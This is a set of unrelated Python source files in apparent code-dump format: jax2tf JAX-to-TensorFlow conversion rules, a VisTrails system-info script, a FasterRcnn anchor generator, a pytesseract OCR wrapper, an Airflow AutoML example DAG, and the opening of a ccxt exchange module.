@functools.partial(bool_to_int8, argnums=0)
def _gather(operand, start_indices, *, dimension_numbers, slice_sizes,
_in_avals, _out_aval):
"""Tensorflow implementation of gather."""
del _in_avals
if not _enable_xla:
raise _xla_path_disabled_error("gather")
proto = _gather_dimensions_proto(start_indices.shape, dimension_numbers)
slice_sizes_tf = _eval_shape(slice_sizes)
out = tfxla.gather(operand, start_indices, proto, slice_sizes_tf, False)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.gather_p] = _gather
def _slice(operand, start_indices, limit_indices, strides):
if strides is None:
strides = [1] * len(start_indices)
slices = tuple(map(slice, start_indices, limit_indices, strides))
return operand[slices]
tf_impl[lax.slice_p] = _slice
def _dynamic_slice(operand, *start_indices, slice_sizes):
# Here we could use tf.slice. Similarly, for lax.gather we can sometimes use
# tf.gather. But those have different semantics for index-out-of-bounds than
# JAX (and XLA). We have tried to force compilation, by wrapping into
# tf.xla.experimental.compile, or tf.function(jit_compile=True), but
# those solutions are brittle because they do not work when nested into an
# outer compilation (see b/162814494 and b/163006262). They also do not
# survive well being put in a SavedModel. Hence, we now use TFXLA slicing
# and gather ops.
if not _enable_xla:
raise _xla_path_disabled_error("dynamic_slice")
res = tfxla.dynamic_slice(operand, tf.stack(start_indices),
size_indices=slice_sizes)
# TODO: implement shape inference for XlaDynamicSlice
res.set_shape(tuple(slice_sizes))
return res
tf_impl[lax.dynamic_slice_p] = _dynamic_slice
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
def _scatter(operand, scatter_indices, updates, *,
update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del unique_indices, _in_avals
assert len(update_consts) == 0, "Update computation cannot have constants"
if not _enable_xla:
raise _xla_path_disabled_error("scatter")
proto = _scatter_dimensions_proto(scatter_indices.shape, dimension_numbers)
def update_computation(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(update_jaxpr, update_consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
o_spec = tf.TensorSpec((), dtype=operand.dtype)
xla_update_computation = (
tf.function(update_computation, autograph=False).get_concrete_function(o_spec, o_spec))
out = tfxla.scatter(operand, scatter_indices, updates, xla_update_computation, proto,
indices_are_sorted=indices_are_sorted)
# TODO: implement shape analysis for XlaScatter
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.scatter_p] = _scatter
tf_impl_with_avals[lax.scatter_min_p] = _scatter
tf_impl_with_avals[lax.scatter_max_p] = _scatter
tf_impl_with_avals[lax.scatter_mul_p] = _scatter
tf_impl_with_avals[lax.scatter_add_p] = _scatter
def _dynamic_update_slice(operand, update, *start_indices):
if not _enable_xla:
raise _xla_path_disabled_error("dynamic_update_slice")
return tfxla.dynamic_update_slice(operand, update, tf.stack(start_indices))
tf_impl[lax.dynamic_update_slice_p] = _dynamic_update_slice
def _cond(index: TfVal, *operands: TfVal,
branches: Sequence[core.ClosedJaxpr],
linear: Sequence[bool]) -> Sequence[TfVal]:
del linear
# tf.cond needs lambdas with no arguments.
branches_tf = [functools.partial(_interpret_jaxpr, jaxpr, *operands)
for jaxpr in branches]
return tf.switch_case(index, branches_tf)
tf_impl[lax_control_flow.cond_p] = _cond
def _while(*args: TfVal, cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
cond_consts, body_consts, init_carry = util.split_list(args, [cond_nconsts,
body_nconsts])
if cond_jaxpr.out_avals[0].shape: # type: ignore[attr-defined]
# The conditional is not a scalar, this must be a batched while
return _batched_cond_while(*args,
cond_nconsts=cond_nconsts, cond_jaxpr=cond_jaxpr,
body_nconsts=body_nconsts, body_jaxpr=body_jaxpr)
# The conditional must return a single value to TF
def cond_tf_func(*args: TfVal) -> TfVal:
pred, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *args)
return pred
body_tf_func = functools.partial(_interpret_jaxpr, body_jaxpr, *body_consts)
return tf.while_loop(cond_tf_func, body_tf_func, init_carry)
def _batched_cond_while(*args: TfVal,
cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr
) -> Sequence[TfVal]:
"""Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
"""
cond_consts, body_consts, init_carry = util.split_list(args, [cond_nconsts,
body_nconsts])
# Initial computation of batched condition
init_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *init_carry)
assert init_pred_b is not core.unit
def new_cond_tf_func(pred_b: TfVal, *carry: TfVal) -> TfVal:
pred = tf.reduce_any(pred_b, axis=list(range(len(pred_b.shape))))
return pred
def new_body_tf_func(pred_b: TfVal, *carry: TfVal) -> Sequence[TfVal]:
new_carry: Sequence[TfVal] = _interpret_jaxpr(body_jaxpr,
*body_consts, *carry)
def select_one_carry(new_c: TfVal, c: TfVal) -> TfVal:
pred_b_bcast = _broadcast_in_dim(pred_b,
shape=new_c.shape,
broadcast_dimensions=list(range(len(pred_b.shape))))
return tf.where(pred_b_bcast, new_c, c)
selected_carry: Sequence[TfVal] = list(
util.safe_map(select_one_carry, new_carry, carry))
next_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *selected_carry)
return (next_pred_b, *selected_carry)
_, *res_carry = tf.while_loop(new_cond_tf_func, new_body_tf_func,
(init_pred_b, *init_carry))
return res_carry
tf_impl[lax_control_flow.while_p] = _while
# We use the scan impl rule to rewrite in terms of while.
tf_impl_with_avals[lax_control_flow.scan_p] = _convert_jax_impl(lax_control_flow._scan_impl)
def _top_k(operand: TfVal, k: int) -> Tuple[TfVal, TfVal]:
# Some types originally incompatible with tf.math.top_k can be promoted
# to a compatible type without loss of precision.
def promote_tf_dtype(tf_dtype):
if tf_dtype in [tf.bool, tf.uint8, tf.uint16]:
return tf.uint32
if tf_dtype in [tf.int8, tf.int16]:
return tf.int32
if tf_dtype is tf.float16:
return tf.float32
return None
conversion_dtype = promote_tf_dtype(operand.dtype)
if conversion_dtype:
values, indices = tf.math.top_k(tf.dtypes.cast(operand, conversion_dtype),
k=k, sorted=True)
return tf.dtypes.cast(values, operand.dtype), indices
else:
return tf.math.top_k(operand, k=k, sorted=True)
tf_impl[lax.top_k_p] = _top_k
def _sort(*operands: TfVal, dimension: int, is_stable: bool,
num_keys: int) -> Tuple[TfVal, ...]:
if not _enable_xla:
raise _xla_path_disabled_error("sort")
assert 1 <= num_keys <= len(operands)
assert all([operands[0].shape == op.shape for op in operands[1:]])
assert 0 <= dimension < len(
operands[0].shape
), f"Invalid {dimension} for ndim {len(operands[0].shape)}"
  # The comparator is a 2N-argument TF function, with arguments [2k] and [2k + 1]
  # corresponding to two scalars from operand[k]. This hand-rolled version is
  # kept for reference only; it is not used below (see `lexicographic_comparator`).
def lexicographic_comparator_old(*tf_args: TfVal) -> TfVal:
assert len(tf_args) == 2 * len(operands)
# We build a comparison:
# arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...))
# all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1]
inside_comparison = None
for key_idx in range(num_keys - 1, -1, -1):
a = tf_args[2 * key_idx]
b = tf_args[2 * key_idx + 1]
a_lt_b = tf.math.less(a, b)
if inside_comparison is None:
inside_comparison = a_lt_b
else:
inside_comparison = tf.math.logical_or(
a_lt_b, tf.math.logical_and(tf.math.equal(a, b), inside_comparison))
return inside_comparison
comparator_spec: List[tf.TensorSpec] = []
comparator_jax_in_avals: List[core.AbstractValue] = []
for op in operands:
o_spec = tf.TensorSpec((), dtype=op.dtype)
comparator_spec.extend([o_spec, o_spec])
o_aval = core.ShapedArray((), to_jax_dtype(op.dtype))
comparator_jax_in_avals.extend([o_aval, o_aval])
# Use the same comparator that JAX uses when compiling to XLA, to get the
# proper NaN/Inf total order, and the lexicographic ordering.
  # The comparator is a 2N-argument TF function, with arguments [2k] and [2k + 1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator(*tf_args: TfVal) -> TfVal:
return _convert_jax_impl(
lax._sort_lt_comparator, multiple_results=False)(
*tf_args,
_in_avals=comparator_jax_in_avals,
_out_aval=core.ShapedArray((), np.bool_),
num_keys=num_keys)
xla_comparator_computation = (
tf.function(lexicographic_comparator,
autograph=False).get_concrete_function(*comparator_spec))
results = tfxla.variadic_sort(operands, dimension=dimension,
is_stable=is_stable,
comparator=xla_comparator_computation)
return results
tf_impl[lax.sort_p] = _sort
def _fft(x, fft_type, fft_lengths):
FFT, IFFT, RFFT, IRFFT = list(map(xla_client.FftType, [0, 1, 2, 3]))
if fft_type == IRFFT:
expected_lengths = x.shape[-len(fft_lengths):-1] + ((x.shape[-1] - 1) * 2,)
else:
expected_lengths = x.shape[-len(fft_lengths):]
if expected_lengths != fft_lengths:
raise NotImplementedError(
f"Unsupported fft_lengths={fft_lengths} for fft_type={fft_type} of "
f"array with shape={x.shape}.")
tf_funcs = {FFT: [tf.signal.fft, tf.signal.fft2d, tf.signal.fft3d],
IFFT: [tf.signal.ifft, tf.signal.ifft2d, tf.signal.ifft3d],
RFFT: [tf.signal.rfft, tf.signal.rfft2d, tf.signal.rfft3d],
IRFFT: [tf.signal.irfft, tf.signal.irfft2d, tf.signal.irfft3d]}
return tf_funcs[fft_type][len(fft_lengths) - 1](x)
tf_impl[lax_fft.fft_p] = _fft
def _qr(operand, full_matrices):
return tf.linalg.qr(operand, full_matrices=full_matrices)
tf_impl[lax_linalg.qr_p] = _qr
def _svd(operand, full_matrices, compute_uv):
result = tf.linalg.svd(operand, full_matrices, compute_uv)
if not compute_uv:
return result,
s, u, v = result
return s, u, tf.linalg.adjoint(v)
tf_impl[lax_linalg.svd_p] = _svd
def _eig(operand: TfVal, compute_left_eigenvectors: bool,
compute_right_eigenvectors: bool):
if compute_left_eigenvectors and compute_right_eigenvectors:
# TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to
# sort the left eigenvectors in the right order. The jax.numpy.linalg API
# suggests to me that left eigenvectors are anyway seldom used, so I
# think it is acceptable to leave as unimplemented for now.
msg = ("Conversion of eig is not implemented when both "
"compute_left_eigenvectors and compute_right_eigenvectors are set "
"to True.")
raise NotImplementedError(msg)
elif not (compute_left_eigenvectors or compute_right_eigenvectors):
return tuple([tf.linalg.eigvals(operand)])
elif compute_right_eigenvectors:
return tuple(tf.linalg.eig(operand))
else: # compute_left_eigenvectors == True
wH, vl = tf.linalg.eig(tf.linalg.adjoint(operand))
wHH = tf.math.conj(wH)
return tuple([wHH, vl])
tf_impl[lax_linalg.eig_p] = _eig
def _eigh(operand: TfVal, lower: bool):
if operand.shape[-1] == 0:
v, w = operand, tf.reshape(operand, operand.shape[:-1])
else:
if not lower:
operand = tf.linalg.adjoint(operand)
w, v = tf.linalg.eigh(operand)
cast_type = { tf.complex64: tf.float32
, tf.complex128: tf.float64 }.get(operand.dtype)
if cast_type is not None:
w = tf.cast(w, cast_type)
return v, w
tf_impl[lax_linalg.eigh_p] = _eigh
def _lu(operand: TfVal, _in_avals, _out_aval):
return _convert_jax_impl(lax_linalg._lu_python)(operand, _in_avals=_in_avals,
_out_aval=_out_aval)
tf_impl_with_avals[lax_linalg.lu_p] = _lu
def _triangular_solve(a: TfVal, b: TfVal, *, left_side: bool, lower: bool,
transpose_a: bool, conjugate_a: bool,
unit_diagonal: bool):
if unit_diagonal:
a = tf.linalg.set_diag(a, tf.ones(a.shape[:-1], dtype=a.dtype))
if not left_side:
rank = len(a.shape)
transpose_dimensions = list(range(rank - 2)) + [rank - 1, rank - 2]
a = tf.transpose(a, transpose_dimensions)
b = tf.transpose(b, transpose_dimensions)
lower = not lower
# adjoint == transpose for real dtypes, so special care need only be taken
# for complex types.
if a.dtype in [tf.complex64, tf.complex128]:
if (transpose_a and not conjugate_a) or (not transpose_a and conjugate_a):
a = tf.math.conj(a)
result = tf.linalg.triangular_solve(a, b, lower=lower, adjoint=transpose_a)
if not left_side:
result = tf.transpose(result, transpose_dimensions)
return result
tf_impl[lax_linalg.triangular_solve_p] = _triangular_solve
def _linear_solve(*args: TfVal, const_lengths, jaxprs, _in_avals, _out_aval):
return _convert_jax_impl(lax_control_flow._custom_linear_solve_impl)(
*args, const_lengths=const_lengths, jaxprs=jaxprs, _in_avals=_in_avals, _out_aval=_out_aval)
tf_impl_with_avals[lax_control_flow.linear_solve_p] = _linear_solve
def _custom_jvp_call_jaxpr(*args: TfVal,
fun_jaxpr: core.ClosedJaxpr,
jvp_jaxpr_thunk: Callable,
num_consts: int) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_jvp_call_jaxpr_p] = _custom_jvp_call_jaxpr
def _custom_vjp_call_jaxpr(*args: TfVal,
fun_jaxpr: core.ClosedJaxpr,
**_) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_vjp_call_jaxpr_p] = _custom_vjp_call_jaxpr
def _custom_lin(*args: TfVal, **_) -> Sequence[TfVal]:
raise TypeError("can't apply forward-mode autodiff (jvp) to a custom_vjp "
"function.")
tf_impl[ad.custom_lin_p] = _custom_lin
def split_to_logical_devices(
tensor: TfVal,
partition_dimensions: pxla.PartitionsOrReplicated):
"""Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
Returns:
an annotated tensor.
"""
# This corresponds to the sharding annotations in
# xla_bridge._sharding_to_proto.
if partition_dimensions is None:
return xla_sharding.replicate(tensor, use_sharding_op=True)
num_partition_splits = np.prod(partition_dimensions)
tile_assignment = np.arange(num_partition_splits).reshape(
partition_dimensions)
return xla_sharding.tile(tensor, tile_assignment, use_sharding_op=True)
def _sharded_call(f: lu.WrappedFun, vals: Sequence[TfVal],
in_parts: Sequence[pxla.PartitionsOrReplicated],
out_parts_thunk,
**_) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
sharded_vals = util.safe_map(split_to_logical_devices, vals, in_parts)
vals_out = f.call_wrapped(*sharded_vals)
out_parts_flat = out_parts_thunk()
assert len(out_parts_flat) == len(vals_out), f"expected {len(out_parts_flat)} == {len(vals_out)}"
sharded_vals_out = [
(split_to_logical_devices(val, val_part), val_aval)
for (val, val_aval), val_part in util.safe_zip(vals_out, out_parts_flat)
]
return sharded_vals_out
def _sharding_constraint(arg: TfVal, *,
partitions: pxla.PartitionsOrReplicated):
return split_to_logical_devices(arg, partitions)
tf_impl[sharded_jit.sharding_constraint_p] = _sharding_constraint
def _register_checkpoint_pytrees():
"""Registers TF custom container types as pytrees."""
m = tf.Module()
# The types here are automagically changed by TensorFlow's checkpointing
# infrastructure.
m.a = (tf.Module(), tf.Module())
m.b = [tf.Module(), tf.Module()]
m.c = {"a": tf.Module()}
tuple_wrapper = type(m.a)
list_wrapper = type(m.b)
dict_wrapper = type(m.c)
# TF AutoTrackable swaps container types out for wrappers.
assert tuple_wrapper is not tuple
assert list_wrapper is not list
assert dict_wrapper is not dict
jax.tree_util.register_pytree_node(
tuple_wrapper, lambda xs: (tuple(xs), None), lambda _, xs: tuple(xs))
jax.tree_util.register_pytree_node(
list_wrapper, lambda xs: (tuple(xs), None), lambda _, xs: list(xs))
jax.tree_util.register_pytree_node(
dict_wrapper,
lambda s: (tuple(s.values()), tuple(s.keys())),
lambda k, xs: dict(zip(k, xs)))
_register_checkpoint_pytrees()
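# Illustrative usage sketch: the tf_impl/tf_impl_with_avals rules registered above
# are exercised when a JAX function is converted with the `convert` entry point
# defined earlier in this module and the result is called on TF values, e.g.
#   f_tf = convert(lambda x: jnp.sort(x))   # lowers via tf_impl[lax.sort_p]
#   f_tf(tf.constant([3.0, 1.0, 2.0]))
# (jnp is jax.numpy; the sort rule requires the XLA path, see `_enable_xla` above.)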
|
py | 1a4bbb59d14a8698f932d5954b91475d669116a0 | #!/usr/bin/env python
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# Basic information
import sys
import platform
print "Python:"
print " Basic version: %s.%s.%s" % (sys.version_info[0],
sys.version_info[1],
sys.version_info[2], )
print " Full version: " + sys.version.replace('\n', ' ')
print
def c(s):
return s or "<COULD NOT DETERMINE>"
print "System:"
print " Type: " + c(platform.system())
print " Architecture: " + c(platform.architecture()[0])
print " Machine: " + c(platform.machine())
print " Platform: " + c(platform.platform())
print " Processor: " + c(platform.processor())
print
##############################################################################
print "Libraries:"
try:
import sip
print " sip installed."
print " version: " + sip.SIP_VERSION_STR
except ImportError:
print " sip NOT installed."
print
try:
import PyQt4.Qt
print " PyQt installed."
print " Qt version: " + PyQt4.Qt.QT_VERSION_STR
print " PyQt version: " + PyQt4.Qt.PYQT_VERSION_STR
except ImportError:
print " PyQt NOT installed."
print
try:
import vtk
print " VTK installed."
print " VTK short version: " + vtk.vtkVersion().GetVTKVersion()
print " VTK full version: " + vtk.vtkVersion().GetVTKSourceVersion()
except ImportError:
print " VTK NOT installed."
|
py | 1a4bbc20ec3fed57ac854bfb128ddaf7830589f8 | # Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""FasterRcnn anchor generator."""
import numpy as np
class AnchorGenerator():
"""Anchor generator for FasterRcnn."""
def __init__(self, base_size, scales, ratios, scale_major=True, ctr=None):
"""Anchor generator init method."""
self.base_size = base_size
self.scales = np.array(scales)
self.ratios = np.array(ratios)
self.scale_major = scale_major
self.ctr = ctr
self.base_anchors = self.gen_base_anchors()
def gen_base_anchors(self):
"""Generate a single anchor."""
w = self.base_size
h = self.base_size
if self.ctr is None:
x_ctr = 0.5 * (w - 1)
y_ctr = 0.5 * (h - 1)
else:
x_ctr, y_ctr = self.ctr
h_ratios = np.sqrt(self.ratios)
w_ratios = 1 / h_ratios
if self.scale_major:
ws = (w * w_ratios[:, None] * self.scales[None, :]).reshape(-1)
hs = (h * h_ratios[:, None] * self.scales[None, :]).reshape(-1)
else:
ws = (w * self.scales[:, None] * w_ratios[None, :]).reshape(-1)
hs = (h * self.scales[:, None] * h_ratios[None, :]).reshape(-1)
base_anchors = np.stack(
[
x_ctr - 0.5 * (ws - 1), y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1), y_ctr + 0.5 * (hs - 1)
],
axis=-1).round()
return base_anchors
def _meshgrid(self, x, y, row_major=True):
"""Generate grid."""
xx = np.repeat(x.reshape(1, len(x)), len(y), axis=0).reshape(-1)
yy = np.repeat(y, len(x))
if row_major:
return xx, yy
return yy, xx
def grid_anchors(self, featmap_size, stride=16):
"""Generate anchor list."""
base_anchors = self.base_anchors
feat_h, feat_w = featmap_size
shift_x = np.arange(0, feat_w) * stride
shift_y = np.arange(0, feat_h) * stride
shift_xx, shift_yy = self._meshgrid(shift_x, shift_y)
shifts = np.stack([shift_xx, shift_yy, shift_xx, shift_yy], axis=-1)
shifts = shifts.astype(base_anchors.dtype)
# first feat_w elements correspond to the first row of shifts
# add A anchors (1, A, 4) to K shifts (K, 1, 4) to get
# shifted anchors (K, A, 4), reshape to (K*A, 4)
all_anchors = base_anchors[None, :, :] + shifts[:, None, :]
all_anchors = all_anchors.reshape(-1, 4)
return all_anchors
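# Example usage sketch; base_size, scales, ratios and the feature-map shape below
# are arbitrary illustration values, not FasterRcnn defaults.
if __name__ == "__main__":
    generator = AnchorGenerator(base_size=8, scales=[8, 16, 32], ratios=[0.5, 1.0, 2.0])
    print(generator.base_anchors.shape)  # (9, 4): one base anchor per (scale, ratio) pair
    anchors = generator.grid_anchors(featmap_size=(4, 4), stride=16)
    print(anchors.shape)  # (144, 4): 4 * 4 grid positions x 9 base anchors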
|
py | 1a4bbddca481d7c5669e74877f81fc89bb1bb30b | import os
import json
from pytesseract import image_to_data, image_to_string, Output
from ocr_utils import list_files_path, get_files_list
from eval_utils import get_accuracy
from PIL import Image, ImageDraw, ImageFont
class ocr:
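    """Thin pytesseract wrapper: runs OCR over the .tif images found in input_dir,
    writes plain-text or word-level JSON results under output_dir, measures
    accuracy against ground-truth .txt files, and can draw word bounding boxes."""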
def __init__(self, input_dir, output_dir):
self.input_dir = input_dir
self.output_dir = output_dir
self.input_image_list = []
self.output_image_list = []
def load_data(self):
files_path = list_files_path(self.input_dir)
self.input_image_list = get_files_list(files_path)
os.makedirs(os.path.join(self.output_dir, 'texts'), exist_ok=True)
os.makedirs(os.path.join(self.output_dir, 'images'), exist_ok=True)
os.makedirs(os.path.join(self.output_dir, 'jsons'), exist_ok=True)
for im in self.input_image_list:
base_name = os.path.basename(im)
file_name = os.path.splitext(base_name)[0] + "___tess."
self.output_image_list.append(file_name)
def predict(self, output_type='txt'):
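        """Run Tesseract (config '--oem 1', the LSTM engine) on every input image
        and write one file per image: the raw text when output_type is 'txt', or
        the full image_to_data dictionary as JSON when output_type is 'json'."""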
for im_in, im_out in zip(self.input_image_list, self.output_image_list):
if output_type == 'txt':
output_path = os.path.join(
os.path.join(self.output_dir, 'texts'), im_out
) + 'txt'
tf = open(output_path, "wt")
result = image_to_string(im_in + "tif", config='--oem 1')
tf.write(result)
tf.close()
elif output_type == 'json':
output_path = os.path.join(
os.path.join(self.output_dir, 'jsons'), im_out
) + 'json'
tf = open(output_path, "w")
dd = image_to_data(im_in + "tif", output_type=Output.DICT)
json.dump(dd, tf, indent=2)
tf.close()
else:
print("ERROR: Unknown format!")
def eval(self, method="char"):
accuracy = []
for gt, of in zip(self.input_image_list, self.output_image_list):
# output_path = self.output_dir + "/texts/" + of + "txt"
output_path = os.path.join(
os.path.join(self.output_dir, "texts"), of
) + "txt"
accuracy.append(get_accuracy(gt + "txt", output_path, method))
try:
print(
"%s based accuracy : %.2f" %
(method, sum(accuracy) / len(accuracy))
)
except TypeError:
print("ERROR: Can't measure accuracy!")
def draw_bb(self):
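        """Overlay the recognized words and their bounding boxes, read from the
        JSON files produced by predict(), onto each input image and save it as a
        .jpg under output_dir/images."""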
for im_in, im_out in zip(self.input_image_list, self.output_image_list):
img = Image.open(im_in + 'tif').convert("RGB")
draw = ImageDraw.Draw(img)
font = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 40)
json_path = os.path.join(
os.path.join(self.output_dir, 'jsons'), im_out
) + 'json'
tf = open(json_path, "r")
file_json = json.load(tf)
for i in range(len(file_json["level"])):
if file_json["text"][i] != "":
x1 = file_json["left"][i]
y1 = file_json["top"][i]
x2 = file_json["left"][i] + file_json["width"][i]
y2 = file_json["top"][i] + file_json["height"][i]
draw.text(
(x1, y1), file_json["text"][i], fill='red', font=font
)
draw.rectangle(((x1, y1), (x2, y2)), outline='red')
output_path = os.path.join(
os.path.join(self.output_dir, 'images'), im_out
) + 'jpg'
            img.save(output_path)
|
py | 1a4bbe04c6b791dfb823b628c73dbfb0bbfe548f | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses Google AutoML services.
"""
import os
import airflow
from airflow import models
from airflow.gcp.hooks.automl import CloudAutoMLHook
from airflow.gcp.operators.automl import (
AutoMLCreateDatasetOperator, AutoMLDeleteDatasetOperator, AutoMLDeleteModelOperator,
AutoMLImportDataOperator, AutoMLTrainModelOperator,
)
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "your-project-id")
GCP_AUTOML_LOCATION = os.environ.get("GCP_AUTOML_LOCATION", "us-central1")
GCP_AUTOML_TRACKING_BUCKET = os.environ.get(
"GCP_AUTOML_TRACKING_BUCKET",
"gs://automl-video-datasets/youtube_8m_videos_animal_tiny.csv",
)
# Example values
DATASET_ID = "VOT123456789"
# Example model
MODEL = {
"display_name": "auto_model_1",
"dataset_id": DATASET_ID,
"video_object_tracking_model_metadata": {},
}
# Example dataset
DATASET = {
"display_name": "test_video_tracking_dataset",
"video_object_tracking_dataset_metadata": {},
}
IMPORT_INPUT_CONFIG = {"gcs_source": {"input_uris": [GCP_AUTOML_TRACKING_BUCKET]}}
default_args = {"start_date": airflow.utils.dates.days_ago(1)}
extract_object_id = CloudAutoMLHook.extract_object_id
# Example DAG for AutoML Video Intelligence Object Tracking
with models.DAG(
"example_automl_video_tracking",
default_args=default_args,
schedule_interval=None, # Override to match your needs
user_defined_macros={"extract_object_id": extract_object_id},
) as example_dag:
create_dataset_task = AutoMLCreateDatasetOperator(
task_id="create_dataset_task", dataset=DATASET, location=GCP_AUTOML_LOCATION
)
dataset_id = (
'{{ task_instance.xcom_pull("create_dataset_task", key="dataset_id") }}'
)
import_dataset_task = AutoMLImportDataOperator(
task_id="import_dataset_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
input_config=IMPORT_INPUT_CONFIG,
)
MODEL["dataset_id"] = dataset_id
create_model = AutoMLTrainModelOperator(
task_id="create_model", model=MODEL, location=GCP_AUTOML_LOCATION
)
model_id = "{{ task_instance.xcom_pull('create_model', key='model_id') }}"
delete_model_task = AutoMLDeleteModelOperator(
task_id="delete_model_task",
model_id=model_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
delete_datasets_task = AutoMLDeleteDatasetOperator(
task_id="delete_datasets_task",
dataset_id=dataset_id,
location=GCP_AUTOML_LOCATION,
project_id=GCP_PROJECT_ID,
)
create_dataset_task >> import_dataset_task >> create_model >> \
delete_model_task >> delete_datasets_task
|
py | 1a4bbf05878362e0512e21b7e00910ace5f1366c | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
def describe(self):
return self.deep_extend(super(bitz, self).describe(), {
